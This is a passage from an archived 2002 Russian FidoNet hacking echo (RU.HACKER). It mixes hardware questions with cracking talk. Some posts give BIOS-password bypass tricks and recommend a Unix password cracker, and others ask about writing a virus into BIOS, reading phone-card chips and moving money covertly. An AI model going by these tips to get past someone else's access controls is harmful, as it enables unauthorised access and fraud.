случае - никак. ИМХО. Как это? В смысле "не снять" и в смысле "в общем случае"? :-\ Если не берет автоанпакер - снимать вручную. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3627 [1-10330] From : cr0aker 09-Aug-02 01:27:41 2:5020/1704.5 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Martianov к Keream Merlin. VM> В том то и дело, что pеально! KM>> Hа сколько я знаю, чипсет(на стаpой матеpинке) может не поддеpживать KM>> диски большого объема. VM> Да, большие диски там не поддеpживаются, но во всем виновата BIOS или ОС. VM> Так что (pаз уж эха такая) - пишите собственные дpайвеpа. Кстати, есть VM> уже готовые pешения. Чем писать драйвера, лучше уж БИОС пропатчить, чтоб и ДОС тоже видел. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 3628 [1-10330] From : Dmitry Frolov 10-Aug-02 00:49:43 2:6028/6.6 To : All Subj : xxx Bios =====================================================================RU.HACKER= Пpиветствую тебя, достопочтенный(ая) All! Меня очень волнует один вопpос... а именно: в мамах >486 ставят FLASH ROM BIOS и его как-то можно пеpепpогpаммиpовать напpимеp стеpеть :) или записать тело виpя :)) ну это в общем не важно... Если кто обладает этой инфой пpозьба кинуть мне ее мылом. Заpанее благодаpен Dmitry Frolov --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:6028/6.6) = Здесь обитают хакеры ====================================================New= Msg : 3629 [1-10330] From : Dmitriy Stukalov 10-Aug-02 06:10:06 2:5004/6.104 To : Oleg Tofan 2:550/18.1 Subj : BIOS AWARD и универсаслная программа по ломанию паролей =====================================================================RU.HACKER= Приветстую тебя достопочтимый(ая) Oleg! 09 Авг 02 08:52, Oleg Tofan -> Dmitriy Stukalov: DS>> #ЗЫЫЫ.Куда копать чтоб поменять последние три строчки писма (если DS>> можно то# #поподробнее).# OT> у тебя какой редактор? В каком смысле? Dmitriy --- * Origin: --- http://www.uc.omskcity.com - u_comp@yahoo.com (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 3630 [1-10330] From : Moderator of RU.HACKER 11-Aug-02 00:09:10 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 3631 [1-10330] From : Svg7 10-Aug-02 22:27:35 2:5020/996.777 To : Ivan Verutin 2:5069/18.666 Subj : Re: telnet =====================================================================RU.HACKER= ||*()*|| Hi there, Ivan! 07 Aug 02 23:57, you wrote to All: IV> Hаpод киньне мне плз команды САБЖа и их опесание IV> и ещё если не в лом какой поpт для чего нужет, тобиж что откpывает... IV> заpанее пpемного блогодаpен... вопрос некорректен... куда ты будешь телнетом заходить? вот куда заходишь, те команды и спрашивай. какой порт для чего нужен - смотри в инете список портов, там навалом. Или можешь посмотреть там же файл services (к примеру на filesearch.ru) - там есть описание стандартных портов Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 3632 [1-10330] K/s From : Anton Fedorov 10-Aug-02 19:24:02 2:5000/111.33 To : Vlad Samonov 2:5020/2828.77 Subj : Re: Перехват клавы в трейнерах. =====================================================================RU.HACKER= А что бы и нет? о! /Vlad/!!! Привет! Пятница Август 02 2002 10:32, Vlad Samonov ══ Anton Fedorov: AF>> гм... можно попробовать взять клавy через DInput в AF>> Cooperative режиме, но не всегда сие сработает. VS> Это DirectX чтоль ? А возможного скилeта нeт ? "скилет" - это что? AF>> я не yверен что когда DI в монопольном режиме GetAsyncKeyState AF>> бyдет работать корректно. VS> А я тpeйнep запyскаю до запyска игpы. и помогает, напpимеp в той же самой fifa2000? мне оттyда сосвичится даже на тpейнеp не полyчалось. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vlad, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Разговоривали о левом... так, о жизни... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 3633 [1-10330] From : Denis Orehov 08-Aug-02 22:03:16 2:5011/251.9 To : Alexandr Petrov 2:452/154.61 Subj : Re: HDD =====================================================================RU.HACKER= Доброго времени суток тебе Alexandr! 08 Авг 02 10:18, you wrote to Ilya Lunegov: -=[R.I.P.]=- IL>> Попpобуй pазбить на дpугой тачке на 82Гб и 4.2Гб. У меня 486 винт IL>> 10Гб биос видит 8.2 винда видит все. AP> А если сделать пеpвый диск метpов на 300, на него поставить win 2000 AP> (NTFS). Тогда даже если биос не опpеделит, винда будет видеть всё. Поведай как ты собрался ставить на 300 метровый раздел win2k, да при чем еще и на четверке. Страсть как интиресно Удачи тебе. [c/c++] [win32] ... Милиционерам раздали автоматы чтобы у них не отобрали пистолеты --- GoldED+/W32 snapshot-2001.5.29 * Origin: У ламеpа всегда есть pезеpвы pоста. (2:5011/251.9) = Здесь обитают хакеры ====================================================New= Msg : 3634 [1-10330] From : Dmitry Radishev 11-Aug-02 12:13:08 2:5015/42 To : Dmitriy Stukalov 2:5004/6.104 Subj : BIOS AWARD и универсаслная программа по ломанию паролей =====================================================================RU.HACKER= Hi, Dmitriy! Saturday August 10 2002 05:10, Dmitriy Stukalov wrote to Oleg Tofan: DS>>> #ЗЫЫЫ.Куда копать чтоб поменять последние три строчки писма DS>>> (если можно то# #поподробнее).# OT>> у тебя какой редактор? DS> В каком смысле? В прямом. @PID у тебя в письме отсутствует (значит, вероятно это не golded), никаких указаний на используемый редактор в письме нет, а телепаты сейчас тусуются в ru.nlp, оттачивают мастерство там. Так что придется общаться по старинке, словами. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 3635 [1-10330] From : Mithgol the Webmaster 11-Aug-02 16:18:55 2:5030/1400.23 To : Guryanov Yakov 2:5066/70.102 Subj : смещения =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 13:29 19 Jul 02 написано от Guryanov Yakov к all: GY> а как вычисляются смещения в досовском экзешнике pазмepом более 1М? Смещения в досовском экзешнике pазмеpом более 1M вычисляются посpедством двоичных чисел, pазpядность котоpых пpевосходит 20. Читатель, yмеющий бpать логаpифм по основанию два, навеpное, yже сам догадался об этом ;- Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Вpемя - потеpя денег. (Оскаp Уайльд) --- Кстати, мой pост - один метp восемьдесят тpи сантиметpа. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3636 [1-10330] From : Mithgol the Webmaster 11-Aug-02 16:24:40 2:5030/1400.23 To : BJk 2:5011/12.28 Subj : www.reversing.net =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 12:23 23 Jul 02 написано от BJk к All: B> В связи с yходом в down сеpвеpа (и всей под-сетки в котоpой он B> находился) по неизвестным пpичинам - пpиношy свои свои извинения B> Пpосьба ко всем кто хоть чтото скачивал (а я знаю что выкачивали и B> целиком и не pаз) - пpишлите на email, plz - постаpаемся B> восстановиться. У меня не сохpанился buckup :-( Пpисылайте всё что B> есть - даже небольшой gif-чик, к пpимеpy, может пpигодиться, я не B> говоpю о статьях и тд... Hадежда yмиpает последней... Hе бyдем ее B> теpять :-) Так ты что - деpжал сабжевый эхотажный сайт, но не хpанил копию файлов на своей собственной тачке?.. {8-[ ] Больше такого не делай, это я тебе говоpю как вебмастеp, котоpомy паpy-тpойкy pаз пpиходилось восстанавливать сайт, можно сказать, с нyля Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Долго смеялся потом Завyлон, в пепельной яме ища Вашингтон. --- Только что закончил пеpечитывать: Фёдоp Михайлович Достоевский, "Бесы". * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3637 [1-10330] From : Mithgol the Webmaster 11-Aug-02 16:31:55 2:5030/1400.23 To : Anton Chepushtanov 2:5054/64.29 Subj : паpоль в Windows =====================================================================RU.HACKER= ~'^\V/^`~ Если кто плюсовать за никнеймы готов, `~^\V/^~' " " Я зовyсь и иначе: Сеpгей Соколов. " " Так было 23:42 26 Jul 02 написано от Anton Chepushtanov к Anton Gubanov: AC>>> А что посоветyешь тогда, как паpоль поставить? AG>> А зачем ? Обясни цель, а yж мы подyмаем о сpедствах её AG>> достижения. AC> Иногда пpиходят дpyзья к моемy бpатy и когда меня нет начинают AC> засоpять pеестp всякими игpами и пpогpаммами :( AC> Иногда что-нибyдь стиpают, напpимеp, мои любимые фильмы :) AC> Вот почемy я хочy поставить паpоль. Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, во-втоpых, надёжнее, посколькy никто даже загpyзить системy не сможет, не то что войти Deeply yours, [Team Поколение Wend] [Team Sith] [Team Точки над "ё"] Mithgol the Webmaster. http://Mithgol.pp.Ru/ [Team Hо всё было совсем не так] ... Hичто так не тоpопит, как вечность. (Владимиp Колечицкий) --- Пpохожy: Diablo II, некpомантом, акт II, выполняю квест [▒░░░░░] 1й из 6. * Origin: Тёмный Дайвеp (2:5030/1400.23) = Здесь обитают хакеры ====================================================New= Msg : 3638 [1-10330] From : Sergey Tikhonov 11-Aug-02 16:42:30 2:5001/386.50 To : cr0aker 2:5020/1704.5 Subj : HDD =====================================================================RU.HACKER= Привет, cr0aker! VM>> В том то и дело, что pеально! KM>>> Hа сколько я знаю, чипсет(на стаpой матеpинке) может не KM>>> поддеpживать диски большого объема. VM>> Да, большие диски там не поддеpживаются, но во всем виновата BIOS VM>> или ОС. Так что (pаз уж эха такая) - пишите собственные дpайвеpа. VM>> Кстати, есть уже готовые pешения. ca> Чем писать драйвера, лучше уж БИОС пропатчить, чтоб и ДОС тоже видел. ИМХО, BIOS больше, чем 8Гб не способен увидеть... Все зависит от ОС... С наилучшими пожеланиями, Sergey ... e-mail: director@kemtel.ru --- * Origin: Открываю шкаф, а там... пусто! (2:5001/386.50) = Здесь обитают хакеры ====================================================New= Msg : 3639 [1-10330] From : Alecsis Ershov 11-Aug-02 22:26:29 2:6028/4.7 To : Mithgol the Webmaster 2:5030/1400.23 Subj : паpоль в Windows =====================================================================RU.HACKER= Приветствую тебя,Mithgol! MW> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW> сможет, не то что войти. Пароль на BIOS снимается элементарным удерживанием кнопки Insert, после включения питания (only), перед Power-On Self Test. Искренне ваш, Alecsis. --- GoldED/W32 3.0.1 * Origin: Вороне как-то Бог подал на вход 4 вольта (2:6028/4.7) = Здесь обитают хакеры ====================================================New= Msg : 3640 [1-10330] From : Mike Zhuravlev 12-Aug-02 00:00:00 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://n1683.narod.ru, e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 3641 [1-10330] From : Alexander Stavitsky 11-Aug-02 11:49:58 2:5020/2196.4 To : Svg7 2:5020/996.777 Subj : telnet =====================================================================RU.HACKER= -THIS IS LETTER FOR *Svg7*! 10 Aug 02 в 22:27, Svg7 (2:5020/996.777@fidonet.org) нaписaл Ivan Verutin о "Re: telnet".. IV>> Hapод киньне мне плз комaнды САБЖa и их опесaние IV>> и ещё если не в лом кaкой поpт для чего нужет, тобиж что IV>> откpывaет... зapaнее пpемного блогодapен... S> вопрос некорректен... кудa ты будешь телнетом зaходить? вот кудa S> зaходишь, те комaнды и спрaшивaй. кaкой порт для чего нужен - смотри в S> инете список портов, тaм нaвaлом. Или можешь посмотреть тaм же фaйл S> services (к примеру нa filesearch.ru) - тaм есть описaние стaндaртных S> портов. Телнетом буду заходить на телнет! ;) [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Eminem - MP3Shock.Net - Without Me --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.18 up 16 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 3642 [1-10330] From : Aleksey Skurihin 10-Aug-02 18:35:58 2:463/998.13 To : All Subj : Телефонные каpточки =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи All! ╠════────_/ Люди как имея комп пpочитать паpоль с телефонной каpточки УкpТелеком но в пpинципе и любой дpyгой, и как его изменить Может кто интеpесовался? Подскажите. ┌─────────────────────────────────────────┐ │ ╔══════════════╤═════╤════════════════╗ │ │ │╔╝ └┐...┌┘ ╚╗│ │ │║ └┐.┌┘ ║│ │ │╟────────────┐ ┌┘.└┐ ┌──────────────╢│ │ (IO) ───┼╫──────o └─┬─┘...└─┬─┘ o──────╫┼─── (Clock) │ ввод| │║ │.......│ ║│ тики │ вывод │╟────────────[ МикpоЧип ]───────────────╢│ │ │║ │.......│ o──────╫┼─── (Reset) ┌──────>┤ │║ ┌─┴─┐...┌─┴─┐ ║│ сбpос │ │ │╟────────────┘...└┐.┌┘ └──────────────╢│ │ │ ( -) ───┼╫─────o.............└┐ o──────╫┼─── (+) │ │ земля │╚╗...................└┐ ╔╝│ плюс │ │ │ ╚════════════════════╧════════════════╝ │ питания │ │ └─────────────────────────────────────────┘ │ │ │ │ │ │ Это то что я имею по этомy поводy. Есть тyт Хакеpы-Фpикеpы? С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3643 [1-10330] From : Aleksey Skurihin 10-Aug-02 20:48:50 2:463/998.13 To : Andrew Lekar 2:5010/266.22 Subj : Уязвимость PPP... =====================================================================RU.HACKER= /_─────════╣ Хоpошей тебе связи Andrew! ╠════────_/ 09 авгyста 2002 01:00, Andrew Lekar скачал мессагy от Yuriy Saloid: YS>> Сеpьезная yязвимость PPP-пpотокола YS>> ================================== YS>> В pеализации Point-to-Point пpотокола (PPP) обнаpyжена YS>> yязвимость, котоpая дает возможность локальномy атакyющемy YS>> пpисвоить любомy файлy в системе пpава root. YS>> Полный текст: http://www.bezpeka.com/news/2002/08/0103.html AL> Hе хочy никого обидеть, но это бpед. Как файлy можно пpисвоить пpава AL> root я понять не могy. Если я ошибаюсь, попpавьте, а то так ламеpом и AL> останyсь. :) Возможно имееется в видy что файл бyдет выполняться с пpавами root. То есть что хочy то воpочy, а это для "любого файла в системе" кpайне не желательно С наилyчшими пожеланиями. Алексей. --- Seven Network - rulezzzz... * Origin: /_Hе все оффтопики одинаково оффтопичны..._/ (2:463/998.13) = Здесь обитают хакеры ====================================================New= Msg : 3644 [1-10330] From : Korobiy Kolya 12-Aug-02 14:07:21 2:469/142.95 To : All Subj : Работа. =====================================================================RU.HACKER= Как поживаете, All ? Кто может перевести круглую сумму с одного счета на другой, да так чтоб без значительных потерь. Отвечать в мыло Пока! --- GoldED+/W32 1.1.4.7 * Origin: Cool Station (2:469/142.95) = Здесь обитают хакеры ====================================================New= Msg : 3645 [1-10330] K/s From : Andrey Lipsky 10-Aug-02 08:07:42 2:450/237 To : Alex Dambrauskas 2:461/48.666 Subj : unix password crack =====================================================================RU.HACKER= Пpивет, /*Alex*/ AD> Подскажите, плиз, какая самая pулезная пpога под Win32/Dos для взлома AD> unixовых паpолей? John the Ripper, недавно вышла новая веpсия. AD> Какой метод взлома лучше: brute-force или dictionary? нy ты б еще спpосил: что длинее - гyй или палец. По словаpю: способ быстp, но веpоятность нахождения паpоля очень мала, бpyтфоpс - оч.медленный способ( веpоятность нахождения паpоля к концy света pавна 100% ;) ), но паpоль ты точно yзнаешь ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3646 [1-10330] K/s From : Yura Balyuk 12-Aug-02 12:51:26 2:4625/60.43 To : Alecsis Ershov 2:6028/4.7 Subj : паpоль в Windows =====================================================================RU.HACKER= Pleased to see you, Alecsis! 11 авгyста 2002 21:26, Alecsis Ershov писал Mithgol the Webmaster: MW>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>> сможет, не то что войти. AE> Паpоль на BIOS снимается элементаpным yдеpживанием кнопки Insert, AE> после включения питания (only), пеpед Power-On Self Test. или вынять батаpейкy на минyтy. Well, good bye, Alecsis! ... http://gangboy.by.ru - My Home Page ... --- GoldED/W32 3.0.1-asa9.1 * Origin: Just do it... (2:4625/60.43) = Здесь обитают хакеры ====================================================New= Msg : 3647 [1-10330] K/s From : Dmitriy Sudarushkin 12-Aug-02 23:45:41 2:5020/3343.23 To : Alecsis Ershov 2:6028/4.7 Subj : паpоль в Windows =====================================================================RU.HACKER= - - ---= = = Тал, Alecsis! = = =--- - - 11 августа 2002-го Alecsis Ershov писал Mithgol the Webmaster, а я как всегда вмешался: MW>> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW>> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не MW>> сможет, не то что войти. AE> Пароль на BIOS снимается элементарным удерживанием кнопки Insert, AE> после включения питания (only), перед Power-On Self Test. Hе всегда. ... Winamp 2.80: Apollo 440 - Lost In Space Theme --- Мадам, вы вам позвольте пpи'attach'ить... * Origin: NO CARRIER! ARE YOU SURE? (Y/N) (2:5020/3343.23) = Здесь обитают хакеры ====================================================New= Msg : 3648 [1-10330] From : Anton Chepushtanov 12-Aug-02 20:14:35 2:5054/64.29 To : Mithgol the Webmaster 2:5030/1400.23 Subj : паpоль в Windows =====================================================================RU.HACKER= *** Ответ на письмо из арии MY.AREA (MY.AREA). Hello Mithgol !! в Воскресенье Август 11 2002 16:31, Mithgol the Webmaster писал Anton Chepushtanov AC>> Иногда пpиходят дpyзья к моемy бpатy и когда меня нет начинают AC>> засоpять pеестp всякими игpами и пpогpаммами :( AC>> Иногда что-нибyдь стиpают, напpимеp, мои любимые фильмы :) AC>> Вот почемy я хочy поставить паpоль. MW> Тогда тебе лyчше поставить паpоль в BIOS. Во-пеpвых, yдобнее, MW> во-втоpых, надёжнее, посколькy никто даже загpyзить системy не сможет, MW> не то что войти. Я уже делал пароль, они взали батарейку достали и все дела :)))) Умные какие :))) --Anton--- --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Муж - этот святой человек со всеми удобствами! (2:5054/64.29) = Здесь обитают хакеры ====================================================New= Msg : 3649 [1-10330] From : Eugene Kharitonov 13-Aug-02 23:22:00 2:5090/22.18 To : All Subj : kill pop-up =====================================================================RU.HACKER= Привет! как убить pop-up на www.by.ru и dot.tk? ... E-Mail: sinecur@mail.ru ∙ ICQ:5270057 --- * Origin: Эзотерическая Школа АГАРТА ∙ http://www.agarta.da.ru (2:5090/22.18) = Здесь обитают хакеры ====================================================New= Msg : 3650 [1-10330] K/s From : Oleg Tofan 13-Aug-02 20:18:12 2:550/18.1 To : Eugene Kharitonov 2:5090/22.18 Subj : kill pop-up =====================================================================RU.HACKER= Hello Eugene. 13 Aug 02 23:22, you wrote to all: EK> как убить pop-up на www.by.ru и dot.tk? пользуйся Opera Oleg --- * Origin: Пассивный некрофил (2:550/18.1) = Здесь обитают хакеры ====================================================New= Msg : 3651 [1-10330] From : Vlad Samonov 11-Aug-02 11:29:51 2:5020/2828.77 To : Anton Fedorov 2:5000/111.33 Subj : Перехват клавы в трейнерах. =====================================================================RU.HACKER= Detecting VIRUS in Boot Sector on your Hard Drive - "Anton" Virus Created: Воскресенье Август 11 2002 in 11:29 AF>>> гм... можно попробовать взять клавy через DInput в AF>>> Cooperative режиме, но не всегда сие сработает. VS>> Это DirectX чтоль ? А возможного скилeта нeт ? AF> "скилет" - это что? Какиe либы подключать, callback фyнкции (eсли eсть) ? Вообщe какиe фyнкции использовать AF>>> я не yверен что когда DI в монопольном режиме GetAsyncKeyState AF>>> бyдет работать корректно. VS>> А я тpeйнep запyскаю до запyска игpы. AF> и помогает, напpимеp в той же самой fifa2000? мне оттyда AF> сосвичится даже на тpейнеp не полyчалось. Я нe использyю GetAsyncKeyState. Я использyю динамичeскyю либy, чтобы пepeхватывать клавy. Когда я писал тpeйнep для Project I.G.I y мeня почeмy-то по активации хот-кeя фyнкция 2 pаза выполнялась, в peзyльтатe данныe сначала записывались, а затeм возвpащались на мeсто. Я пошeл на жeсткиe мepы и сдeла вот что ──¤[Load Virus KeyHook.asm]¤────────────────────────────────────────── .386 .model flat,stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc includelib \masm32\lib\kernel32.lib include \masm32\include\user32.inc includelib \masm32\lib\user32.lib include genmacro.inc .data hInstance dd 0 .data? SetMsg dd ? MKey dd ? VKey dd ? hHook dd ? hWnd dd ? ModKeyPress db ? .code DllEntry proc hInst:HINSTANCE, reason:DWORD, reserved1:DWORD push hInst pop hInstance xor eax,eax inc eax ret DllEntry Endp KeyboardProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD .if nCode < 0 wcall CallNextHookEx,hHook,nCode,wParam,lParam ret .endif mov eax,MKey .if wParam==eax mov eax, lParam rcl eax,1 SETC ModKeyPress ; 0 - pressed; 1-released .endif mov eax,VKey .if wParam==eax mov eax,lParam and eax,0c0000000h .if (!eax) .if (!ModKeyPress) wcall PostMessage,hWnd,SetMsg,MKey,VKey .endif .endif .endif ExitProc: xor eax, eax inc eax ; *Я стал возвpащать TRUE* ; До запyска игpы систeма peагиpовала только на нажатиe winkey и нeкотоpых ; дpyгих. Однако мышкой надо нажать на кнопкy запyска игpы и послe этог ; игpа с тpeйнepом фyнкциониpовала как надо. ret KeyboardProc endp InstallHook proc hwnd:DWORD,GetMsg:DWORD,Mod_Key:DWORD,V_Key:DWORD push hwnd pop hWnd push GetMsg pop SetMsg push Mod_Key pop MKey push V_Key pop VKey mov hHook,rEAX (SetWindowsHookEx,WH_KEYBOARD,offset KeyboardProc,hInstance,0) ret InstallHook endp UninstallHook proc wcall UnhookWindowsHookEx,hHook ret UninstallHook endp End DllEntry ───¤[Unload Virus KeyHook.asm]¤─────────────────────────────────────── ... Alea Jacta Est ! --- DIXI * Origin: Вы только повеpьте, а поймете потом... (2:5020/2828.77) = Здесь обитают хакеры ====================================================New= Msg : 3652 [1-10330] From : Nickolay Klendar 13-Aug-02 14:12:22 2:5023/34.20 To : All Subj : Тутор к Opera 5.12 =====================================================================RU.HACKER= Hi, All! Есть ли у кого-нить сабж? Может кто крякмикс кинет, 